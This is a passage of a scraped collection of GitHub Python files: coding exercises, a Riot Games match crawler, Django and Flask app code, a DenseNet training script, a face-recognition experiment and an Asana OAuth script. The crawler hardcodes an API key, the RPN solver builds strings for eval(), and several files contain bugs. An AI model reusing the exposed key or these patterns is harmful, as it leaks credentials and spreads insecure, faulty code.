triple_sum_close(arr,target)\nprint(result)","repo_name":"Lefie/Coding-Interview","sub_path":"two_pointers/triple_sum_close_to_target.py","file_name":"triple_sum_close_to_target.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24578259876","text":"user_input= input('Please enter your name sir ')\nprint(\"welcome\", user_input)\n\n\nprint(\"Enter hours:\")\n\nhours= input()\n\nprint(\"Enter rate:\")\n\nrate= input()\ntry:\n if int(hours) > 40:\n def pay():\n res= float(hours) * (float(rate) * 1.5)\n return res \n print(\"Pay:\", pay())\n else:\n def pay():\n res= float(hours) * (float(rate) * 1.5)\n return res \n print(\"Pay:\", pay())\n if pay()< 20:\n print(\"bad\")\n print(\"good\")\nexcept:\n print(\"retry sir\")\n\nprint(\"done\")\n\nstr = \"X-DSPAM-Confidence: 0.8475\"\n\ncolon = str.find(\":\")\nprint(colon)\n\n\n\ninfo = str[colon+ 1: ]\n\nprint(float(info))\n\n\n","repo_name":"Abdelwadoud-Boukerma/AB_Python","sub_path":"list/py4e.py","file_name":"py4e.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"15551588276","text":"'''\nEvaluate the value of an arithmetic expression in Reverse Polish Notation.\n\nValid operators are +, -, *, and /. Each operand may be an integer or another expression.\n\nNote that division between two integers should truncate toward zero.\n\nIt is guaranteed that the given RPN expression is always valid. 
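The pay calculator in the py4e exercise above applies the 1.5x multiplier to all hours once the total exceeds 40 (and its else-branch repeats the same formula); the usual rule pays 1.5x only on the hours past 40. A corrected sketch:

```python
def pay(hours, rate):
    # Overtime applies only to the hours beyond 40.
    if hours > 40:
        return 40 * rate + (hours - 40) * rate * 1.5
    return hours * rate

print(pay(45, 10.0))  # 475.0
```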
That means the expression would always evaluate to a result, and there will not be any division by zero operation.\n\n \n\nExample 1:\nInput: tokens = [\"2\",\"1\",\"+\",\"3\",\"*\"]\nOutput: 9\nExplanation: ((2 + 1) * 3) = 9\n\nExample 2:\nInput: tokens = [\"4\",\"13\",\"5\",\"/\",\"+\"]\nOutput: 6\nExplanation: (4 + (13 / 5)) = 6\n\nExample 3:\nInput: tokens = [\"10\",\"6\",\"9\",\"3\",\"+\",\"-11\",\"*\",\"/\",\"*\",\"17\",\"+\",\"5\",\"+\"]\nOutput: 22\nExplanation: ((10 * (6 / ((9 + 3) * -11))) + 17) + 5\n= ((10 * (6 / (12 * -11))) + 17) + 5\n= ((10 * (6 / -132)) + 17) + 5\n= ((10 * 0) + 17) + 5\n= (0 + 17) + 5\n= 17 + 5\n= 22\n'''\n\nclass Solution(object):\n def evalRPN(self, tokens):\n operators = ['+', '-', '*', '/']\n result = []\n for token in tokens:\n if token not in operators:\n result.append(token)\n else:\n b = result.pop() \n a = result.pop()\n if int(a) * int(b) < 0 and token == '/' and int(a) % int(b) != 0:\n result.append(str(eval(a + token + b) + 1))\n else:\n result.append(str(eval(a + token + b)))\n return int(result[0])\n \n","repo_name":"ojhaanshu87/LeetCode","sub_path":"150_reverse_polish_notation.py","file_name":"150_reverse_polish_notation.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"34651236453","text":"import requests\nimport time\nimport json\n\nclass GameResultCrawler():\n def __init__(self, name):\n self.dataset = list()\n self.apiKey = \"RGAPI-27f494d3-1248-4d0c-a7f6-3c64b4e3ac4d\"\n self.myName = name.replace(' ', '-')\n self.headers = {\n \"Origin\": \"https://developer.riotgames.com\",\n \"Accept-Charset\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n \"X-Riot-Token\": self.apiKey,\n \"Accept-Language\": \"ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,zh;q=0.5\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\"\n }\n URL_id = \"https://kr.api.riotgames.com/lol/summoner/v4/summoners/by-name/{}\".format(name)\n res_id = requests.get(URL_id, headers=self.headers)\n self.accountId = res_id.json()['accountId']\n\n def crawlMatchlists(self, counter, season, queue=420): # queue=420 for Rank game\n URL_matchlists = \"https://kr.api.riotgames.com/lol/match/v4/matchlists/by-account/{0}?queue={1}&season={2}&endIndex={3}&beginIndex={4}\".format(self.accountId, queue, season, (counter+1)*100+1, counter*100+1)\n res_matchlists = requests.get(URL_matchlists, headers=self.headers)\n \n matchlist = [mtc[\"gameId\"] for mtc in res_matchlists.json()[\"matches\"]]\n\n return matchlist\n\n def crawlMatch(self, match):\n URL_match = \"https://kr.api.riotgames.com/lol/match/v4/matches/{}\".format(match)\n res_match = requests.get(URL_match, headers=self.headers)\n data = res_match.json()\n\n if res_match.status_code == 429:\n print(\"pending\")\n time.sleep(int(res_match.headers['Retry-After']))\n\n res_match = requests.get(URL_match, headers=self.headers)\n data = res_match.json()\n\n myPick = None # id to identify myPick in match\n\n participantIdentities = data['participantIdentities']\n result = None # win = 1\n for pi in participantIdentities:\n if pi['player']['accountId'] == self.accountId:\n myPick = pi['participantId']\n if pi['participantId'] <= 5:\n if data['teams'][0]['win'] == 'Win': result = 1\n else: result = 0\n else:\n if data['teams'][1]['win'] == 'Win': result = 1\n else: result = 0\n\n participants = data['participants']\n champions = list()\n for 
ptc in participants:\n champions.append(ptc['championId'])\n\n # [picks1~10], result, myPick\n dataset = list()\n dataset.extend(champions)\n dataset.append(result)\n dataset.append(myPick)\n\n \n return dataset\n\n def main_crawler(self, exist_matchlist=False):\n season = 13\n matchlist = list()\n dataset = list()\n\n if exist_matchlist:\n m = open('./history/matchlist_{}.json'.format(self.myName), 'r')\n matchlist = json.load(m)\n else:\n list_counter = 0 # matchlist counter\n try:\n print(\"Collecting Matchlist\")\n while True: \n matchlist.extend(crawler.crawlMatchlists(list_counter, season))\n list_counter += 1\n except Exception as e:\n print(e)\n finally:\n print(\"Complete collecting Matchlist\")\n with open('./history/matchlist_{}.json'.format(self.myName), 'w') as mt:\n json.dump(matchlist, mt, indent=4)\n\n try:\n print(\"Collecting Match results\")\n for match in matchlist:\n try:\n data = crawler.crawlMatch(match)\n #print(data)\n dataset.append(data)\n except Exception as e:\n print(\"{0} : {1}\".format(match, e))\n except Exception as e:\n print(e)\n finally:\n with open('./history/history_{}.json'.format(self.myName), 'w') as f:\n json.dump(dataset, f, indent=4)\n\n\nif __name__ == \"__main__\":\n crawler = GameResultCrawler('hide on bush')\n crawler.main_crawler(exist_matchlist=True)","repo_name":"laurelwoods0102/LOL-winrate-prediction","sub_path":"mainCrawler.py","file_name":"mainCrawler.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"20622550202","text":"# Custom exception to show when a key is not found in the prefix class\n\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass KIDXPrefixNotFound(Exception):\n def __init__(self, key):\n self.key = key\n self.message = _(\"Key %s not found in the prefix class.\") % self.key\n super().__init__(self.message)\n\n\nclass KIDXNotImplementedProperly(Exception):\n def __init__(self):\n self.message = _(\"Prefix class either not found or not implemented.\")\n super().__init__(self.message)\n","repo_name":"khalti/Kidx","sub_path":"kidx/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26039239177","text":"# Same as \"e_interp\" but for u. 
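`crawlMatch` above retries once after sleeping for the `Retry-After` header when the Riot API answers HTTP 429. The retry wrapper on its own (the 1-second fallback when the header is missing is an assumption):

```python
import time
import requests

def get_with_retry(url, headers):
    # One retry after honouring the rate-limit hint, as in crawlMatch.
    res = requests.get(url, headers=headers)
    if res.status_code == 429:
        time.sleep(int(res.headers.get("Retry-After", "1")))
        res = requests.get(url, headers=headers)
    return res
```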
Is it actually used anywhere?\nimport numpy as np\nfrom scipy.interpolate import CubicSpline\nimport matplotlib.pyplot as plt\n\n\ndef u_interp(u_disc,t_step,t):\n n = len(u_disc)\n print(n)\n ts = np.arange(0.0,float(n),1.0) * t_step\n print(ts)\n u_cont = CubicSpline(ts,u_disc,bc_type='natural')\n\n # Should it be u_cont?\n return u_cont(t)\n","repo_name":"KlickInc/klickhealth-labs-papers-grm-public","sub_path":"src/GlucoseModel/u_interp.py","file_name":"u_interp.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5308487870","text":"txt = input()[:-1]\ncomm, *vals = txt.split()\nvals = ''.join(vals)\nfor val in vals.split(','):\n for i in range(len(val)):\n if val[i] == '[' or val[i] == '&' or val[i] == '*':\n name, left = val[:i], val[i:]\n break\n else:\n name, left = val, ''\n\n reform = ''\n for i in list(left)[::-1]:\n if i == ']':\n reform += '[]'\n elif i == '[':\n continue\n else:\n reform += i\n print(comm + reform + ' ' + name + ';')","repo_name":"louisuss/Algorithms-Code-Upload","sub_path":"Python/Baekjoon/String/3568.py","file_name":"3568.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4197864809","text":"#ToniP\n#INF103\n#celciousToFarenheitTable\n\n#display celsius tepms 0-20\n#F = (9/5 * C) + 32\nC = 0 #counter\n#Display a table\n\nfor C in range(-1,21):\n C += 1\n degree = (9/5 * C) + 32\n print(C, format(degree, '.2f'))\n \n","repo_name":"pradora/Python-Portfolio","sub_path":"02.05.2019_celsiusToFahrenheitTable.py","file_name":"02.05.2019_celsiusToFahrenheitTable.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71875692347","text":"from flask import Flask, request, jsonify, render_template, abort, redirect, url_for\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\nalarmId = 0\n\n# 임시로 데이터를 저장할 리스트\nalarm_data = []\n\n@app.route('/')\ndef main():\n return render_template('main.html', alarm_data=alarm_data)\n\n@app.route('/your-endpoint', methods=['GET', 'POST'])\ndef your_endpoint():\n global alarmId\n\n if request.method == 'GET':\n # GET 방식으로 요청이 들어왔을 \n idValue = alarmId\n nameValue = request.args.get('name')\n timeValue = request.args.get('time')\n\n try:\n # 받은 데이터를 alarm_data에 저장\n data = {\n 'id': idValue,\n 'name': nameValue,\n 'time': timeValue,\n }\n alarm_data.append(data)\n alarmId += 1\n\n response_data = {'result': 'success', 'id': idValue, 'name': nameValue, 'time': timeValue}\n return jsonify(response_data)\n except Exception as e:\n traceback.print_exc() # 오류 메시지 출력\n \n return jsonify({'result': 'error', 'message': str(e)}), 500\n else:\n return jsonify({'result': 'error', 'message': 'Invalid request method.'}), 400\n\n@app.route('/read')\ndef read():\n return render_template('read.html', alarm_data=alarm_data)\n\nif __name__ == '__main__':\n app.run()\n app.config['TEMPLATES_AUTO_RELOAD'] = True\n","repo_name":"jueunkorstd/homenetwork","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"29284387975","text":"\"\"\"komentor URL Configuration\n\nThe `urlpatterns` list routes URLs to views. 
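`u_interp` above fits a natural cubic spline through evenly spaced samples and evaluates it at an arbitrary t. A runnable check of that behaviour:

```python
import numpy as np
from scipy.interpolate import CubicSpline

t_step = 0.5
u_disc = np.array([0.0, 1.0, 0.5, 2.0])
ts = np.arange(len(u_disc), dtype=float) * t_step
u_cont = CubicSpline(ts, u_disc, bc_type="natural")

print(u_cont(0.75))            # value between the 2nd and 3rd samples
print(u_cont(ts) - u_disc)     # ~0: the spline interpolates the knots
```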
For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom .views import create_comment, create_document, new_document, show_document, show_documents\n\nurlpatterns = [\n url(r'^$', show_documents),\n url(r'^admin/', admin.site.urls),\n url(r'^create-comment/(.*)', create_comment, name=\"create_comment\"),\n url(r'^create-document/', create_document, name='create_document'),\n url(r'^document/(.*)', show_document, name='document'),\n url(r'^document-creation/', new_document, name=\"document_creation\"),\n url(r'^documents/', show_documents, name='documents_list'),\n]\n","repo_name":"undead404/komentor","sub_path":"komentor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16537704615","text":"# Python 3.5.2 using Keras with the Tensorflow Backend.\r\n# Created on 12.08.2018, by Huy-Hieu PHAM, Cerema & IRIT, France.\r\n\r\n\r\nfrom __future__ import print_function\r\n\r\nimport os\r\nimport time\r\nimport timeit\r\nimport json\r\nimport argparse\r\nimport densenet\r\nimport numpy as np\r\nimport keras.backend as K\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport itertools\r\nimport math\r\n\r\nfrom keras.optimizers import Adam\r\nfrom keras.utils import np_utils\r\nfrom keras.layers import Dense, Dropout, Activation, Flatten, Lambda, BatchNormalization\r\nfrom keras.layers.advanced_activations import ELU\r\nfrom keras.layers import Convolution2D, MaxPooling2D, AveragePooling2D, merge\r\nfrom keras.engine import Input, Model\r\nfrom keras.optimizers import SGD\r\nfrom keras.callbacks import Callback, LearningRateScheduler, ModelCheckpoint, EarlyStopping\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\n# Load and process data.\r\nnb_classes = 3\r\n\r\n# learning rate schedule\r\ndef step_decay(epoch):\r\n\tinitial_lrate = 3e-4\r\n\tdrop = 0.5\r\n\tepochs_drop = 100.0\r\n\tlrate = initial_lrate * math.pow(drop, math.floor((1+epoch)/epochs_drop))\r\n\treturn lrate\r\n\r\n# 2539 for training and 2536 for testing.\r\nimg_width, img_height = 32, 32\r\ntrain_data_dir = 'data/tisseo/train' \r\nvalidation_data_dir = 'data/tisseo/validation'\r\nnb_train_samples = 2539\r\nnb_validation_samples = 2536\r\nepochs = 250\r\nbatch_size = 64\r\n\r\nif K.image_data_format() == 'channels_first':\r\n input_shape = (3, img_width, img_height)\r\nelse:\r\n input_shape = (img_width, img_height, 3)\r\n\r\n\r\n # Construct DenseNet architeture.\r\n model = densenet.DenseNet(nb_classes, \r\n input_shape, \t\r\n 40,\t\t\t\t# Depth: int -- how many layers; \"Depth must be 3*N + 4\"\r\n 3,\t\t\t\t# nb_dense_block: int -- number of dense blocks to add to end\r\n 12,\t\t\t\t# growth_rate: int -- number of filters to add\r\n 16,\t\t\t\t# nb_filter: 
int -- number of filters\r\n dropout_rate=0.2,\r\n weight_decay=0.0001)\t\t\t\t\t\t \r\n\t\t\t\t\t\t\t \r\n\t\t\t\t\t\t\t \r\n# Model output.\r\nmodel.summary()\r\n\r\n# Compile the model.\r\nmodel.compile(optimizer=Adam(lr=0.0003, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0),\r\n loss = 'sparse_categorical_crossentropy',\r\n metrics = ['accuracy'])\r\n\t\t\t\t \r\n# learning schedule callback\r\nlrate = LearningRateScheduler(step_decay)\r\ncallbacks_list = [lrate]\r\n\r\n# Data augmentation.\r\ntrain_datagen = ImageDataGenerator(rescale = 1./255)\r\ntest_datagen = ImageDataGenerator(rescale = 1./255)\r\n\r\ntrain_generator = train_datagen.flow_from_directory(train_data_dir,\r\n target_size = (img_width, img_height),\r\n batch_size = batch_size,\r\n class_mode = 'sparse')\r\n\r\nvalidation_generator = test_datagen.flow_from_directory(validation_data_dir,\r\n target_size = (img_width, img_height),\r\n batch_size = batch_size,\r\n class_mode = 'sparse')\r\n\r\n\r\n# Fit model.\r\nhistory = model.fit_generator(train_generator,\r\n steps_per_epoch=nb_train_samples // batch_size,\r\n epochs=epochs,\r\n validation_data=validation_generator,\r\n validation_steps=nb_validation_samples // batch_size,\r\n callbacks=callbacks_list,\r\n\t\t\t verbose=2)\r\n\r\n# Saving weight.\r\nmodel.save_weights('DenseNet-40-Tisseo.h5')\r\n\r\n# List all data in history.\r\nprint(history.history.keys())\r\n\r\n# grab the history object dictionary\r\nH = history.history\r\n\r\nlast_test_acc = history.history['val_acc'][-1] * 100\r\nlast_train_loss = history.history['loss'][-1] \r\nlast_test_acc = round(last_test_acc, 2)\r\nlast_train_loss = round(last_train_loss, 6)\r\ntrain_loss = 'Training Loss, min = ' + str(last_train_loss)\r\ntest_acc = 'Test Accuracy, max = ' + str(last_test_acc) +' (%)'\r\n \r\n# plot the training loss and accuracy\r\nN = np.arange(0, len(H[\"loss\"]))\r\nplt.style.use(\"ggplot\")\r\nplt.figure()\r\naxes = plt.gca()\r\naxes.set_ylim([0.0,1.2])\r\nplt.plot(N, H['loss'],linewidth=2.5,label=train_loss,color='blue')\r\nplt.plot(N, H['val_acc'],linewidth=2.5, label=test_acc,color='red')\r\n#plt.plot(N, H['val_loss'],linewidth=2.5,label=\"Test Loss\")\r\n#plt.plot(N, H['acc'],linewidth=2.5, label=\"Training Accuracy\")\r\nplt.title('Enhanced-SPMF DenseNet-40 on Tisséo',fontsize=12, fontweight='bold',color = 'Gray')\r\nplt.xlabel('Number of Epochs',fontsize=11, fontweight='bold',color = 'Gray')\r\nplt.ylabel('Training Loss and Test Accuracy',fontsize=12, fontweight='bold',color = 'Gray')\r\nplt.legend()\r\n \r\n# Save the figureL\r\nplt.savefig('output/tisseo/Enhanced-SPMF-DenseNet-40-Tisseo-Cerema.png')\r\nplt.show()\r\n","repo_name":"huyhieupham/DenseNet-Action-Recognition-with-Enhanced-SPMFs","sub_path":"DenseNet-Tisseo-Cerema-Dataset.py","file_name":"DenseNet-Tisseo-Cerema-Dataset.py","file_ext":"py","file_size_in_byte":5200,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"74362942909","text":"#analyse and process each clip\n#pipeline: https://www.draw.io/?state=%7B%22ids%22:%5B%221jtC9XGqnJuqxOkcRz7jqPCOd6H2ZsXp3%22%5D,%22action%22:%22open%22,%22userId%22:%22115019067398552559764%22%7D#G1jtC9XGqnJuqxOkcRz7jqPCOd6H2ZsXp3\n\nimport video_face_recognition\nimport face_recognition\nimport os\nimport face_recognition_models\nimport dlib\nimport cv2\nimport time\nimport pickle\n\nFILM_NAME = \"captain_america\"\nOUTPUT_DIR = \"../results/round_2/\" + FILM_NAME + \"/\"\nif not os.path.exists(OUTPUT_DIR):\n os.makedirs(OUTPUT_DIR)\n\n# 
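The `step_decay` schedule defined in the training script above halves the learning rate every 100 epochs (the first drop lands at epoch 99 because of the `1 + epoch` offset). Running it stand-alone makes the drop points visible:

```python
import math

def step_decay(epoch, initial_lrate=3e-4, drop=0.5, epochs_drop=100.0):
    # Same formula as the LearningRateScheduler callback above.
    return initial_lrate * math.pow(drop, math.floor((1 + epoch) / epochs_drop))

for e in (0, 98, 99, 199, 299):
    print(e, step_decay(e))
```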
GET QUERY\n\nEXPERIMENT_DIR = \"./\"\nFILM_DATA_DIR = \"../data/round1_symlink/\" + FILM_NAME + \"/\"\nVIDEO_DIR = FILM_DATA_DIR + \"video_clips/\"\nFACES_DIR = FILM_DATA_DIR + \"faces/manual_poor/\"\nSCENES = [\"scene_0\",\"scene_1\",\"scene_2\",\"scene_3\",\"scene_4\"]\n\ndef get_div_dir(scene_number):\n    return VIDEO_DIR + SCENES[scene_number] + '/'\n\n# actor_kb structure: {\"actor_name\" : {\"character_name\":\"\", \"image_path\":\"\"}}\nactor_kb = {}\n#name_mappings = {\"channing_tatum\":\"jenko\", \"jonah_hill\":\"schmidt\", \"brie_larson\" : \"molly_tracey\", \"dave_franco\":\"eric_molson\"}\nname_mappings = {\"chris_evans\":\"steve_rogers\",\"hayley_atwell\":\"peggy_carter\",\"sebastian_stan\":\"james_buchanan_barnes\",\"tommy_lee_jones\":\"col_chester_phillips\"}\n# CREATE KNOWLEDGE BASE OF ACTORS & REFERENCE IMAGE PATHS & CHARACTERS RELEVANT TO QUERY\nfor name in name_mappings:\n    actor_kb[name] = dict({\"character\":\"\",\"image_path\":\"\"})\n    actor_kb[name][\"character\"] = name_mappings[name]\n    if os.path.exists(FACES_DIR + name + \".jpg\"):\n        actor_kb[name][\"image_path\"] = FACES_DIR + name + \".jpg\"\n    else:\n        for filename in os.listdir(FACES_DIR):\n            parts = filename.split('.')\n            if parts[0] == name:\n                # re-join the name and extension with the dot that split() removed\n                actor_kb[name][\"image_path\"] = FACES_DIR + name + '.' + parts[1]\n                break\n        else:\n            print(\"\\tWarning: couldn't find reference image for \" + name)\n            del actor_kb[name]\n\nprint(\"\\n\\nTried to create KB for actors, please verify:\")\nfor key, data in actor_kb.items():\n    print(\"\\t{}:{}\".format(key,data))\n\ninput(\"continue?\")\n\n# CHECK THAT WE CAN ACCESS VIDEOS\nprint(\"Checking that we can access video paths\")\nfor i, scene in enumerate(SCENES):\n    print(\"\\n\\tTesting for scene \" + str(i))\n    count = 0\n    for vid_path in os.listdir(get_div_dir(i)):\n        if os.path.exists(get_div_dir(i) + vid_path):\n            count += 1\n            print(\"\\tgot path \" + get_div_dir(i) + vid_path)\n        else:\n            print(\"\\tcouldn't find path \" + get_div_dir(i) + vid_path)\n    print(\"\\tFound {} paths\".format(count))\n    input(\"continue?\")\n\n# USING QUERY, THE VIDEO IS SPLIT INTO DIVISIONS, EACH DIVISION GETS A PERCENTAGE\n# FOR DIVISION IN SCENE, RECOGNIZE FACES IN SELECTED DIVISION\nfor i, scene in enumerate(SCENES):\n    # Initialize output stuff for this scene\n    # Result format: list of percentages, for each actor in query. Element (percentage) is added for each division searched. \n    if not os.path.exists(OUTPUT_DIR + scene):\n        os.makedirs(OUTPUT_DIR + scene)\n        #print(\"trying to make output dir for scene {}\".format(i))\n        #input(\"continue?\")\n    results = {}\n    for name in name_mappings:\n        results[name] = []\n    #print(\"Initialized results: \\n\\t{}\".format(results))\n    #input(\"Continue?\")\n\n    start_time = time.time()\n    div_dir = get_div_dir(i)\n    for j, video_path in enumerate(os.listdir(div_dir)):\n        print(\"vid path : \" + video_path)\n        if video_path[0] == '.':\n            continue\n        # From this video division, get the percentage for each actor\n        #print(\"iterating through videos. 
Video {}, vid path {}, div_dir {}\".format(j, video_path, div_dir))\n        info = video_face_recognition.getPercentages(div_dir + video_path, actor_kb, 3)\n        percentages = info[0]\n        for name, percentage in percentages.items():\n            results[name].append(percentage) \n    stop_time = time.time()\n    if os.path.exists(OUTPUT_DIR):\n        dir = OUTPUT_DIR + scene + \"/\" \n    else:\n        print(\"Couldn't find output directory for scene_{}\".format(i))\n        dir = OUTPUT_DIR\n    out = open(dir + FILM_NAME + '_' + scene + \"_results.csv\", 'w')\n    print(\"Writing results for scene {}\".format(i))\n    for actor, val in results.items():\n        out.write(\"{},{}\\n\".format(actor,val))\n    out.write(\"\\nTime to process/sec, {}\".format(stop_time - start_time))\n    out.write(\"\\nFrames analysed: {}/{}\".format(info[1], info[2]))\n    out.close()\n\n    # TODO: COMPILE & PROCESS THE RESULTS INTO TABLE FORMAT\n    # I want to DISPLAY results immediately as a histogram\n    # And also PICKLE them for later analysis. The pickle should contain metadata about the experiment: Date, time, length of experiment vs length of video, the scene being analysed (eg: 21_jump_street_scene1, 21_jump_street_scene2)\n    #pickle(results, i, SCENES[i], getTime, )\n    #write a table to a new pickle file\n    pickle_storage = {}\n    pickle_filename = FILM_NAME + \"_\" + scene + \"_info.pkl\"\n    for actor, val in results.items():\n        pickle_storage[actor] = val\n    #pickle_data = info + tuple(dict({\"time\": (stop_time - start_time), \"film_name\":FILM_NAME, \"scene\":scene}))\n    with open(OUTPUT_DIR + scene + \"/\" + pickle_filename, 'w+b') as pfile:\n        pickle.dump(pickle_storage, pfile)","repo_name":"danjcosg/Final-Year-Project-prototype","sub_path":"experiment1.py","file_name":"experiment1.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22649163984","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom admin_challan.models import Challan\n\n# Create your views here.\n\n\ndef home(request):\n    if request.method == \"POST\":\n        name = request.POST.get(\"username\")\n        password = request.POST.get(\"password\")\n        user = authenticate(request, username = name, password = password )\n\n        if user is not None:\n            login(request, user)\n            return redirect(\"dashboard\")\n        else:\n            messages.success(request, (\"There was an error Logging In, Try Again....\"))\n            return redirect('signin')\n\n\n    return render(request, \"signin.html\")\n\n\ndef signup(request):\n    return render(request, \"signup.html\")\n\n\ndef dashboard(request):\n    emp = Challan.objects.all()\n\n    context = {\n        \"emp\" : emp, \n    }\n\n    return render(request, \"dashboard.html\", context)\n\ndef add(request):\n    if request.method == \"POST\":\n        name = request.POST.get('name')\n        place = request.POST.get('place')\n        license = request.POST.get('license')\n        challan_num = request.POST.get('challan_num')\n        vehicle_type = request.POST.get('vehicle_type')\n        created_by = request.POST.get('created_by')\n\n        emp = Challan(\n            name = name,\n            place = place,\n            license = license,\n            challan_num = challan_num,\n            vehicle_type = vehicle_type,\n            created_by = created_by\n        )\n\n        emp.save()\n        return redirect(\"dashboard\")\n\n    return render(request, \"dashboard.html\")\n\ndef edit(request):\n    emp = Challan.objects.all()\n\n    context = {\n        \"emp\" : emp,\n    }\n    
return redirect(request, \"dashboard.html\", context)\n\ndef update(request, id):\n if request.method == \"POST\":\n name = request.POST.get('name')\n place = request.POST.get('place')\n license = request.POST.get('license')\n challan_num = request.POST.get('challan_num')\n vehicle_type = request.POST.get('vehicle_type')\n created_by = request.POST.get('created_by')\n\n emp = Challan(\n id = id,\n name = name,\n place = place,\n license = license,\n challan_num = challan_num,\n vehicle_type = vehicle_type,\n created_by = created_by\n )\n\n emp.save()\n return redirect(\"dashboard\")\n\n return redirect(request, \"dashboard.html\")\n\n\ndef delete(request, id):\n emp = Challan.objects.filter(id = id)\n context = {\n \"emp\" : emp,\n }\n emp.delete()\n\n return redirect(\"dashboard\")\n\n\n","repo_name":"aarav124/git-github.com-RiyaRanaChhetrii-E-Challan-System","sub_path":"admin_challan/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14096448867","text":"import asana\nimport json\nfrom datetime import date\nimport argparse\nimport sys, os\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\n\ndef summarize(client, project_id, post_project):\n \"\"\"\n Collect data from project_id, and create a summary task in the post_project.\n \"\"\"\n # Get info on the project\n project = client.projects.get_project(project_id)\n\n # Loop through the tasks, collecting data\n all_tasks = 0\n tasks_completed = 0\n tasks = client.tasks.get_tasks_for_project(project_id, opt_fields=['completed'])\n for task in tasks:\n all_tasks += 1\n if task['completed']:\n tasks_completed += 1\n \n # Make the summary task\n summary_task_fields = {\n 'projects': [post_project],\n 'name': \"{} Summary of \\\"{}\\\"\".format(\n date.today().isoformat(), project['name']),\n 'notes': \"{} tasks\\n{} ({:.0%}) tasks completed\".format(\n all_tasks, tasks_completed, tasks_completed / all_tasks)\n }\n client.tasks.create_task(**summary_task_fields)\n\ndef main():\n \"\"\"\n Parse arguments, authorize user, and summarize each given project.\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"project_to_summarize\",\n help=\"project id of project to summarize\")\n parser.add_argument(\"summary_project\",\n help=\"project id of summary project to post to\")\n args = parser.parse_args()\n\n # Use OAuth\n # check if the user has an existing token stored.\n authorized = False\n client = None\n if 'ASANA_CLIENT_ID' in os.environ and 'ASANA_TOKEN' in os.environ:\n # create a client with your OAuth client ID and a previously obtained \n # bearer token\n client = asana.Client.oauth(\n client_id=os.environ['ASANA_CLIENT_ID'],\n token=json.loads(os.environ['ASANA_TOKEN'])\n )\n print(\"authorized=\", client.session.authorized)\n\n # try to get something to see if token has not expired.\n try:\n client.users.get_user('me')\n authorized = True\n except:\n print(\"token expired. 
please update ASANA_TOKEN\")\n\n # check if the user has the secret\n if not authorized and 'ASANA_CLIENT_ID' in os.environ and 'ASANA_CLIENT_SECRET' in os.environ:\n # create a client with the OAuth credentials:\n client = asana.Client.oauth(\n client_id=os.environ['ASANA_CLIENT_ID'],\n client_secret=os.environ['ASANA_CLIENT_SECRET'],\n # this special redirect URI will prompt the user to copy/paste the code\n # useful for command line scripts and other non-web apps\n redirect_uri='urn:ietf:wg:oauth:2.0:oob'\n )\n\n # get an authorization URL:\n (url, state) = client.session.authorization_url()\n try:\n # in a web app you'd redirect the user to this URL when they take \n # action to login with Asana or connect their account to Asana\n import webbrowser\n webbrowser.open(url)\n except Exception as e:\n print(\"Open the following URL in a browser to authorize:\")\n print(url)\n\n print(\"Copy and paste the returned code from the browser and press enter:\")\n\n code = sys.stdin.readline().strip()\n # exchange the code for a bearer token will fail on incorrect code\n token = client.session.fetch_token(code=code)\n\n print(\"token=\", json.dumps(token))\n\n # normally you'd persist 